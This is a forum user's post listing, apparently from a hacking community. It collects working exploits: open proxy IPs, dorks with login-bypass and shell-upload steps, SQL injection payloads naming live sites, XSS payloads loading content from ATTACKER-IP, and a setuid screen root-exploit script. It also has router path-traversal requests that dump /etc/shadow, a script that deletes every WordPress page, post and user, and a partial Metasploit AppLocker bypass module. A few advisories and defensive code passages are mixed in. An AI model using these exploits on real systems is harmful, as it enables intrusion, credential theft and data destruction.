geeko
Posts posted by geeko

  1. 46.99.133.241:1080
    66.58.244.108:24705
    71.228.211.89:17002
    45.63.90.226:6789
    162.254.168.154:56499
    68.7.156.247:13623
    104.238.183.182:6789
    67.197.149.140:18293
    104.219.112.114:52862
    208.104.74.191:27899
    47.35.38.116:57216
    108.218.207.108:30049
    183.232.25.100:4080
    107.151.129.249:1080
    68.178.128.170:18749
    45.63.82.190:6789
    24.2.70.116:24182
    180.92.239.217:1080
    97.82.41.68:40641
    45.63.88.229:6789
    72.243.180.159:45554
    24.196.134.76:18527
    186.121.206.234:1080
    67.197.28.10:43491
    45.63.83.124:6789
    64.126.70.72:53473
    8.30.102.50:45554
    76.8.208.230:45554
    204.248.125.246:45554
    104.207.150.81:6789
    184.20.102.255:1080
    66.167.193.138:22010
    45.32.130.95:6789
    47.208.147.42:27181
    63.240.250.44:50652
    67.170.49.111:29381
    223.25.99.163:1180
    47.222.33.206:55495
    76.29.93.253:50999
    73.25.253.84:25242
    104.238.182.74:6789
    64.121.199.87:20985
    24.189.131.7:19821
    208.74.33.114:10223
    45.63.88.181:6789
    173.208.137.46:6789
    24.178.207.30:10379
    75.118.153.228:10200
    208.104.74.89:27677
    45.32.130.120:6789
    27.123.1.162:1080
    216.10.224.223:45554
    24.74.75.139:34070
    96.237.161.130:46555
    117.74.120.81:1080
    74.75.164.255:10200
    97.99.103.153:53293
    75.151.213.85:3366
    162.213.178.102:45554
    68.64.229.84:45554
    36.66.213.167:1080
    45.63.88.187:6789
    208.104.74.229:27809
    47.35.79.9:46845
    24.240.255.93:12666
    45.32.139.243:6789
    100.42.158.187:45554
    75.76.230.236:45554
    104.238.180.134:6789
    208.104.232.210:52886
    72.91.84.235:51815
    209.159.251.12:56511
    67.197.232.209:23864
    104.238.183.133:6789
    97.77.75.181:28111
    73.181.120.114:59152
    216.24.77.41:17382
    45.32.213.237:6789
    45.63.90.33:6789
    45.63.89.78:6789
    216.212.236.240:45554
    54.215.184.209:34646
    76.29.6.56:40178
    73.199.232.15:30495
    45.32.141.69:6789
    91.195.103.172:31336
    73.15.240.216:28416
    76.94.99.191:63798
    76.25.126.209:58399
    45.63.84.133:6789
    24.16.89.71:38784
    45.32.130.189:6789
    45.32.137.112:6789
    68.117.143.146:17472
    68.81.198.11:21645
    45.32.128.60:6789
    190.129.1.141:46690
    175.143.94.161:10233
    123.207.167.125:1080
    67.197.251.54:20191
    104.244.223.85:24950
    24.72.213.167:45554
    174.141.178.158:45554
    63.142.208.138:14803
    45.32.141.196:6789
    24.93.138.78:10200
    104.241.13.16:10200
    208.104.74.50:27766
    67.197.236.88:22961
    45.55.28.39:21532
    104.220.172.192:14811
    70.99.133.238:15466
    72.47.70.110:55446
    104.244.140.93:45554
    73.13.150.205:12327
    208.111.120.173:10200
    67.197.29.170:43075
    68.225.192.228:21202
    73.59.46.201:45554
    103.195.142.88:9999
    173.26.244.42:36839
    67.197.253.126:18583
    67.197.232.59:24018
    64.4.99.16:62915
    67.197.29.186:43091
    180.178.104.178:1080
    45.55.28.39:24609
    66.110.216.105:39431
    64.184.5.7:45554
    68.198.171.167:29702
    104.219.112.98:16329
    24.249.92.200:45554
    45.63.94.22:6789
    45.63.85.71:6789
    45.32.136.150:6789
    70.234.238.97:8088
    45.63.93.251:6789
    96.27.214.206:45554
    64.185.49.177:45554
    115.133.125.17:55363
    45.63.91.180:6789
    47.88.77.171:1080
    67.197.252.158:18807
    67.50.240.12:26089
    104.238.180.191:6789

     

    • Upvote 2
  2. Dork: intext:"Powered by ENS Consultants"
    |=============================================================|
    |
    |
    | Exploit Title :ENS Consultants Bypass Login Vulnerability
    |
    |
    | Google Dork intext:"Powered by ENS Consultants"
    | Tested on : Paroot
    |
    |======================================|
    |
    | Tutorial :
    |
    | Search The Dork Or Go To Vendor HomePage And Select Your Target
    | Then Go To Admin Panel At : /admin/login.php
    | And Open Noredirect Add-Ons And Click On "Add"
    | Paste The Target With ^ Character : ^Target
    | At Last Change Url To : site/admin/index.php
    | Upload Your Shell And Enjoy !
    |
    |=============================================================|

    • Upvote 3
  3. # # # # #
    # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
    # Google Dork: inurl:index.php?option=com_abstract
    # Date: 02.03.2017
    # Vendor Homepage: http://joomla6teen.com/
    # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
    # Demo: http://demo.joomla6teen.com/abstractmanager
    # Version: 2.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=


    # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
    # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
    # # # # #
  4. The passfile you are actually looking for is a wordlist :) .... or a password list .... you can make it yourself without stress, depending on the countries you want to scan, or if you want to go random you can use something generic that you can find with a single Google search

    • Upvote 1
  5. [+] Credits: John Page AKA hyp3rlinx
    [+] Website: hyp3rlinx.altervista.org
    [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
    [+] ISR: ApparitionSec
    
    
    
    Vendor:
    ==========
    sourceforge.net/projects/phpshell/
    phpshell.sourceforge.net/
    
    
    
    Product:
    =============
    PHPShell v2.4
    
    
    Vulnerability Type:
    ====================
    Cross Site Scripting
    
    
    
    CVE Reference:
    ==============
    N/A
    
    
    
    Security Issue:
    ================
    Multiple cross site scripting entry points exist in PHPShell, undermining
    the integrity between the user's browser and the server and allowing remote
    attackers to bypass access controls such as the same-origin policy if an
    authenticated user clicks an attacker-supplied link.
    
    The XSS issue is made possible because PHPShell calls print
    $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references the URL,
    PHPShell simply reads our XSS payload from the URL and echoes it back to the
    client.
    
    <form name="shell" enctype="multipart/form-data" action="<?php
    print($_SERVER['PHP_SELF']) ?>" method="post">
    
    Since PHPShell's purpose is to execute system commands, this XSS vulnerability
    can potentially become a 'Remote Command Execution'
    vulnerability. Moreover, this XSS issue can also potentially leverage a
    Session Fixation vulnerability also present in PHPShell.
    
    
    Reference:
    "
    http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
    "
    
    
    Tested successfully in Firefox
    
    
    Exploit/POC:
    =============
    
    XSS 1)
    
    http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
    OR Inject IFRAME to phish and steal credentials, you get the idea.
    
    http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--
    
    
    
    XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php
    
    On the Login Authentication HTML form 'username' input field
    
    " onMousemove="alert(document.cookie)
    
    enter a password and hit Enter.
    
    
    
    
    Network Access:
    ===============
    Remote
    
    
    
    Severity:
    =========
    Medium
    
    
    
    Disclosure Timeline:
    ===============================
    Vendor Notification: No reply
    In addition the INSTALL file "Bugs?  Comments?" Tracker System link is HTTP
    404
    http://sourceforge.net/tracker/?group_id=156638
    February 18, 2017 : Public Disclosure
  6. Cisco ASA: Buffer overflows in WebVPN cifs handling

    CVE-2017-3807


    The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.

    When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:

    http_cifs_context:
    +0x160 char* file_dir
    +0x168 char* file_name

    These strings are copied in various places, but the copying is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:

    filename_copy_buf = calloc(1LL, 336LL);
    net_handle[10] = filename_copy_buf;
    if ( filename_copy_buf )
    {
        src_len = _wrap_strlen(filename_from_request);
        if ( filename_from_request[src_len - 1] == ('|') )
        {
            // wrong length (src length)
            strncpy((char *)filename_copy_buf, filename_from_request, src_len - 1);
        }
        /* ... */
    }

    In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.

    There appear to be various other places where the copying is done in an unsafe way:

    http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.

    http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.

    Possibly http_add_query_str_from_context. There are probably others that I missed.

    Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.

    Repro:

    Login to WebVPN portal, navigate to:

    https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.

    ("server" and "name" may be passed verbatim)

    *** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
    ======= Backtrace: =========
    /lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
    /lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
    /lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
    /lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
    lina(+0x321976a)[0x7fa41a2b276a]
    lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
    lina(resMgrCalloc+0x100)[0x7fa419659410]
    lina(calloc+0x94)[0x7fa419589a34]
    lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
    lina(ewsServeFindDocument+0x142)[0x7fa418278192]
    lina(ewsServeStart+0x114)[0x7fa4182784a4]
    lina(ewsParse+0x19a0)[0x7fa418272cc0]
    lina(ewsRun+0x9c)[0x7fa41826955c]
    lina(emweb_th+0x6ab)[0x7fa418286aeb]
    lina(+0xde58ab)[0x7fa417e7e8ab]

    This was tested on 9.6(2)

    This bug is subject to a 90 day disclosure deadline. If 90 days elapse
    without a broadly available patch, then the bug report will automatically
    become visible to the public.

  7. [+] Website: hyp3rlinx.altervista.org
    [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
    [+] ISR: ApparitionSec



    Vendor:
    ===============
    www.sawmill.net



    Product:
    ========================
    Sawmill Enterprise v8.7.9

    sawmill8.7.9.4_x86_windows.exe
    hash: b7ec7bc98c42c4908dfc50450b4521d0

    Sawmill is a powerful hierarchical log analysis tool that runs on every major platform.


    Vulnerability Type:
    ===================================
    Pass the Hash Authentication Bypass



    CVE Reference:
    ==============
    CVE-2017-5496



    Security Issue:
    =====================
    Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords
    can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking
    account password hashes.


    This issue usually is known to affect Windows systems e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also
    present itself in a vulnerable Web application.

    Sawmill account password hashes are stored under LogAnalysisInfo/ directory in "users.cfg".

    e.g.

    users = {
    root_admin = {
    username = "admin"
    password_checksum = "e99a18c428cb38d5f260853678922e03"
    email_address = ""


    This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is
    stored in some other location that is then compromised, it can lead to subversion of Sawmill's authentication process.

    Moreover, since the 'users.cfg' file is world readable, a regular non-Admin Windows user who logs into the system running Sawmill can grab
    a password hash and easily log in to the vulnerable application without needing the password itself.


    How to test?


    Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non Administrator user.

    1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.

    2) Go to the Sawmill login page in a web browser, http://VICTIM-IP:8988/, enter username 'admin' and the hash. Tada! You're Admin.


    Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no salt.


    e.g.

    password: abc123
    MD5 hash:
    e99a18c428cb38d5f260853678922e03



    Disclosure Timeline:
    =====================================
    Vendor Notification: January 7, 2017
    CVE-2017-5496 assigned : January 20
    Request status : January 26
    Vendor: Fix avail later in year still no ETA
    Inform vendor public disclose date
    February 18, 2017 : Public Disclosure



    Network Access:
    ===============
    Remote



    Impact:
    ======================
    Information Disclosure
    Privilege Escalation



    Severity Level:
    ================
    High



    [+] Disclaimer
    The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
    Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
    that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
    is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
    for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
    or exploits by the author or elsewhere.
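
The advisory above boils down to one design error: the value kept in users.cfg is accepted as the credential, so reading the file is as good as knowing the password. The following is an added example and not Sawmill's code or the advisory author's; `vulnerable_check` is a hypothetical model of the flaw (a submitted MD5 checksum compared directly with the stored one), `make_record` and `hardened_check` show the storage and verification that close it (random per-user salt, slow PBKDF2-HMAC-SHA256, constant-time compare, and the server always recomputing from the password itself). The `ROOT_ADMIN` record is constructed in the shape of the users.cfg excerpt, using the advisory's own abc123 example.

```python
import hashlib
import hmac
import os

# Constructed record in the shape of the users.cfg entry quoted in the advisory:
# an unsalted MD5 of the password "abc123", stored as password_checksum.
ROOT_ADMIN = {
    "username": "admin",
    "password_checksum": hashlib.md5(b"abc123").hexdigest(),
}


def vulnerable_check(submitted_checksum, record):
    """Hypothetical model of the flawed check (an assumption, not Sawmill's
    code): the login form sends an MD5 checksum and the server compares it
    with the stored one. The stored value therefore *is* the credential, so
    anyone who can read users.cfg logs in without cracking anything."""
    return submitted_checksum == record["password_checksum"]


def make_record(username, password, iterations=100_000):
    """Hardened storage: a random per-user salt and a slow PBKDF2-HMAC-SHA256
    digest, so the file yields neither a reusable credential nor a cheap
    offline cracking target."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"username": username, "salt": salt,
            "iterations": iterations, "digest": digest}


def hardened_check(submitted_password, record):
    """The server receives the password itself (over TLS) and recomputes the
    digest; a copied digest is just another wrong password. compare_digest
    keeps the comparison constant-time."""
    candidate = hashlib.pbkdf2_hmac("sha256", submitted_password.encode(),
                                    record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["digest"])


def demo():
    """Replay the advisory's scenario against both checks and report the outcomes."""
    stolen_checksum = ROOT_ADMIN["password_checksum"]
    record = make_record("admin", "abc123")
    return {
        "pass_the_hash_works": vulnerable_check(stolen_checksum, ROOT_ADMIN),
        "plaintext_accepted": hardened_check("abc123", record),
        "stolen_digest_rejected": not hardened_check(record["digest"].hex(), record),
        "wrong_password_rejected": not hardened_check("abc124", record),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:24} {outcome}")
```

The point of `stolen_digest_rejected` is the pass-the-hash case: with the hardened scheme, pasting the stored digest into the password field is verified as a password and fails, so a leaked users.cfg or backup no longer hands out a working login, and the salt plus iteration count also removes the "MD5 and no salt" weakness noted at the end of the advisory.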

  8. #############################################################
    # Application Name : SQLi in Dejabú's Scripts
    # Vulnerable Type : SQL Injection
    # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
    # Author: fl3xpl0it a.k.a KurokoTetsuya
    # Date: 20.02.2017
    # Tested On Demo Sites:
    [+] http://www.cepaproduccion.com/content/news.php?id=1114'
    [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
    # Warning: If you do not find SQLi, try SQLi on another parameter.
    # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
    # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
    #############################################################

    • Upvote 1
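
The quote test in this post and the `pid=` injection in the Joomla com_abstract post above rest on the same defect: a request parameter is pasted into the SQL text, so a stray `'` either breaks the statement (the error the dork hunts for) or rewrites it. The following is an added example, not code from either advisory or from the affected products: it builds an in-memory SQLite table with constructed rows (table and column names are invented) and runs the same inputs through a string-built query and a parameterised one, reporting what an observer would see in each case.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for a news.php?id= backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news (id, title) VALUES (?, ?)",
        [(1114, "constructed item 1114"), (34, "constructed item 34")],
    )
    return conn


def vulnerable_lookup(conn, raw_id):
    """The flawed pattern: the raw ?id= value is interpolated into the SQL
    text, so quote characters in it change the statement's structure."""
    sql = "SELECT title FROM news WHERE id = '%s'" % raw_id
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, raw_id):
    """The hardened pattern: the value travels as a bound parameter and is
    compared as data, never parsed as SQL."""
    sql = "SELECT title FROM news WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (raw_id,))]


def probe(conn, lookup, value):
    """Run one lookup and report what an observer sees: a row count, or
    'error' when the database rejected the statement (the syntax error that
    the trailing-quote check in the post looks for)."""
    try:
        return len(lookup(conn, value))
    except sqlite3.OperationalError:
        return "error"


def compare(conn):
    """Exercise both lookups with a normal id, a stray quote and a tautology,
    mirroring the post's 'SQLi detected / no SQLi' distinction."""
    inputs = ["1114", "1114'", "' OR '1'='1"]
    return {
        value: {"vulnerable": probe(conn, vulnerable_lookup, value),
                "safe": probe(conn, safe_lookup, value)}
        for value in inputs
    }


if __name__ == "__main__":
    for value, outcome in compare(make_db()).items():
        print(f"{value!r:16} -> {outcome}")
```

For the parameterised query the quote and the tautology are just text that matches no id, so it returns zero rows and no error; the string-built query errors on the quote and returns every row on the tautology. The post's advice to test each parameter in turn (`cat=` as well as `id=`) corresponds to the fact that every interpolated parameter is a separate instance of `vulnerable_lookup`, and each one has to be converted to the bound form.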
  9. # Exploit Title: Polycom VVX Web Interface - Change Admin Password as User
    # Date: January 26, 2017
    # Exploit Author: Mike Brown
    # Vendor Homepage: http://www.polycom.com/
    # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html
    # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436
    # CVE : N/A
    
    # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface.
    # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses
    # and account information.
    
    1. Login with the "User" Account.
    2. Navigate to Settings > Change Password.
    3. Fill in "Old Password" with the current "User" password.
    4. Fill in "New Password" with the new "Admin" account password, and confirm.
    5. Using a live HTML editor, inspect the old password field. You will see:
    <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword"
    default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password">
    6. Change the name field to "120"
    7. Click "Save"
    8. An error will be shown on screen but you can now log into the Admin account with the new password.
     
    	

     

    • Upvote 1
  10. #!/bin/bash
    # screenroot.sh
    # setuid screen v4.5.0 local root exploit
    # abuses ld.so.preload overwriting to get root.
    # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
    # HACK THE PLANET
    # ~ infodox (25/1/2017) 
    echo "~ gnu/screenroot ~"
    echo "[+] First, we create our shell and library..."
    cat << EOF > /tmp/libhax.c
    #include <stdio.h>
    #include <sys/types.h>
    #include <unistd.h>
    __attribute__ ((__constructor__))
    void dropshell(void){
        chown("/tmp/rootshell", 0, 0);
        chmod("/tmp/rootshell", 04755);
        unlink("/etc/ld.so.preload");
        printf("[+] done!\n");
    }
    EOF
    gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
    rm -f /tmp/libhax.c
    cat << EOF > /tmp/rootshell.c
    #include <stdio.h>
    int main(void){
        setuid(0);
        setgid(0);
        seteuid(0);
        setegid(0);
        execvp("/bin/sh", NULL, NULL);
    }
    EOF
    gcc -o /tmp/rootshell /tmp/rootshell.c
    rm -f /tmp/rootshell.c
    echo "[+] Now we create our /etc/ld.so.preload file..."
    cd /etc
    umask 000 # because
    screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
    echo "[+] Triggering..."
    screen -ls # screen itself is setuid, so... 
    /tmp/rootshell

     

    • Upvote 1
  11. # Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read
    # Date: 27/01/2017
    # Exploit Author: Saeid Atabaki
    # Version: RG4332_V2.7.0
    # Tested on: RG4332 with mini_http 1.19
     
      
      
    = 1 =============================================================
      
    GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
    Connection: close
      
    ---
      
    HTTP/1.0 200 OK
    Content-type: text/html
    Cache-Control: no-cache
    set-cookie: sessionid=17746062;
    set-cookie: auth=ok;
    set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
     
     
    #root:x:0:0:root:/root:/bin/bash
    root:x:0:0:root:/root:/bin/sh
    #tw:x:504:504::/home/tw:/bin/bash
    #tw:x:504:504::/home/tw:/bin/msh
     
      
    = 2 =============================================================
      
    GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
    Connection: close
     
    ---
     
    HTTP/1.0 200 OK
    Content-type: text/html
    Cache-Control: no-cache
    set-cookie: sessionid=17746062;
    set-cookie: auth=ok;
    set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
     
     
    #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
    root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
    #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
    #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
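
Both requests in this post succeed because the `getpage=` value is joined onto a directory name and opened without checking where the resulting path ends up. The following is an added example, not the router's firmware or the post author's code: `resolve_getpage` shows the check that the CGI is missing (decode, normalise, confirm the result is still under the document root), and `flag_traversal` runs the same check over request lines to pick out the traversal attempts on the detection side. `WEB_ROOT`, the function names and the `SAMPLE_REQUESTS` lines are constructed for the example; the device's real document root is not known from the post.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical document root for the example; the device's layout is not known.
WEB_ROOT = "/www"


def resolve_getpage(value, root=WEB_ROOT):
    """Map a getpage= value onto a file under root, or raise ValueError.

    The value is percent-decoded once more than the query parser already did,
    so a double-encoded %252e%252e is caught as well. The path is normalised
    lexically (posixpath.normpath collapses '..') and then checked to still
    lie under root. NUL bytes are rejected because C string handling would
    silently truncate the path there.
    """
    decoded = unquote(value)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes document root: %s" % candidate)
    return candidate


def getpage_from_request_line(line):
    """Pull the getpage parameter out of an HTTP request line ('GET /... HTTP/1.1')."""
    parts = line.split()
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get("getpage")
    return values[0] if values else None


def flag_traversal(request_lines):
    """Detection side: return the getpage values that would escape the root."""
    flagged = []
    for line in request_lines:
        page = getpage_from_request_line(line)
        if page is None:
            continue
        try:
            resolve_getpage(page)
        except ValueError:
            flagged.append(page)
    return flagged


# Constructed request lines in the shape of the ones shown in the post.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/%2e%2e/%2e%2e/%2e%2e/etc/shadow&var:menu=status HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/status.html&var:menu=status&var:page=system_msg HTTP/1.1",
    "GET /cgi-bin/webproc?var:menu=status HTTP/1.1",
]


if __name__ == "__main__":
    for page in flag_traversal(SAMPLE_REQUESTS):
        print("traversal attempt:", page)
```

The check is lexical, which is what a small embedded HTTP server can afford; on a host with symlinks under the document root an `os.path.realpath` comparison would be needed as well. The extra `unquote` pass means a legitimate filename containing a literal `%` would be decoded twice, so on a real server that decision should match how the front end decodes its URLs.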

     

  12. * Exploit Title: Bulk Delete [Privilege Escalation]
    * Discovery Date: 2016-02-10
    * Exploit Author: Panagiotis Vagenas
    * Author Link: https://twitter.com/panVagenas
    * Vendor Homepage: http://bulkwp.com/
    * Software Link: https://wordpress.org/plugins/bulk-delete/
    * Version: 5.5.3
    * Tested on: WordPress 4.4.2
    * Category: WebApps, WordPress
    
    
    Description
    -----------
    
    _Bulk Delete_ plugin for WordPress suffers from a privilege escalation
    vulnerability. Any registered user can exploit the lack of
    capabilities checks to perform all administrative tasks provided by
    the _Bulk Delete_ plugin. Some of these actions, but not all, are:
    
    - `bd_delete_pages_by_status`: deletes all pages by status
    - `bd_delete_posts_by_post_type`: deletes all posts by type
    - `bd_delete_users_by_meta`: delete all users with a specific pair of
    meta name, meta value
    
    Nearly all actions registered by this plugin can be performed by any
    user, as long as they are passed to a query var named `bd_action` and the
    user has a valid account. These actions would normally require
    administrative rights, so we can consider this a privilege
    escalation vulnerability.
    
    PoC
    ---
    
    The following script will delete all pages, posts and users from the
    infected website.
    
    
    ```
    #!/usr/bin/python3
    
    ################################################################################
    # Bulk Delete Privilege Escalation Exploit
    #
    # **IMPORTANT** Don't use this in a production site, if vulnerable it will
    # delete nearly all your sites content
    #
    # Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
    ################################################################################
    
    import requests
    
    loginUrl = 'http://example.com/wp-login.php'
    adminUrl = 'http://example.com/wp-admin/index.php'
    
    loginPostData = {
        'log': 'username',
        'pwd': 'password',
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    
    l = requests.post(loginUrl, data=loginPostData)
    
    if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0:
        print("Couldn't acquire a valid session")
        exit(1)
    
    loggedInCookies = l.history[0].cookies
    
    def do_action(action, data):
        try:
            requests.post(
                adminUrl + '?bd_action=' + action,
                data=data,
                cookies=loggedInCookies,
                timeout=30
            )
        except TimeoutError:
            print('Action ' + action + ' timed out')
        else:
            print('Action ' + action + ' performed')
    
    print('Deleting all pages')
    do_action(
        'delete_pages_by_status',
        {
            'smbd_pages_force_delete': 'true',
            'smbd_published_pages': 'published_pages',
            'smbd_draft_pages': 'draft_pages',
            'smbd_pending_pages': 'pending_pages',
            'smbd_future_pages': 'future_pages',
            'smbd_private_pages': 'private_pages',
        }
    )
    
    print('Deleting all posts from all default post types')
    do_action('delete_posts_by_post_type', {'smbd_types[]': [
        'post',
        'page',
        'attachment',
        'revision',
        'nav_menu_item'
    ]})
    
    print('Deleting all users')
    do_action(
        'delete_users_by_meta',
        {
            'smbd_u_meta_key': 'nickname',
            'smbd_u_meta_compare': 'LIKE',
            'smbd_u_meta_value': '',
        }
    )
    
    exit(0)
    
    ```
    
    Solution
    --------
    
    Upgrade to v5.5.4
    
    Timeline
    --------
    
    1. **2016-02-10**: Requested CVE ID
    2. **2016-02-10**: Vendor notified through wordpress.org support forums
    3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
    4. **2016-02-10**: Vendor responded and received details about the issue
    5. **2016-02-10**: Vendor verified vulnerability
    6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue

     

    exploit source : packetstormsecurity.com

  13. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class Metasploit4 < Msf::Exploit::Local
    Rank = ExcellentRanking
    
    include Msf::Exploit::FileDropper
    include Msf::Post::File
    
    def initialize(info={})
    super(update_info(info,
    'Name' => 'AppLocker Execution Prevention Bypass',
    'Description' => %q{
    This module will generate a .NET service executable on the target and utilise
    InstallUtil to run the payload bypassing the AppLocker protection.
    
    Currently only the InstallUtil method is provided, but future methods can be
    added easily.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Casey Smith', # Original AppLocker bypass research
    'OJ Reeves' # MSF module
    ],
    'Platform' => [ 'win' ],
    'Arch' => [ ARCH_X86, ARCH_X86_64 ],
    'SessionTypes' => [ 'meterpreter' ],
    'Targets' => [ [ 'Windows', {} ] ],
    'DefaultTarget' => 0,
    'DisclosureDate'=> 'Aug 3 2015',
    'References' =>
    [
    ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
    ]
    ))
    
    register_options([
    OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
    'INSTALLUTIL', %w(INSTALLUTIL)])])
    end
    
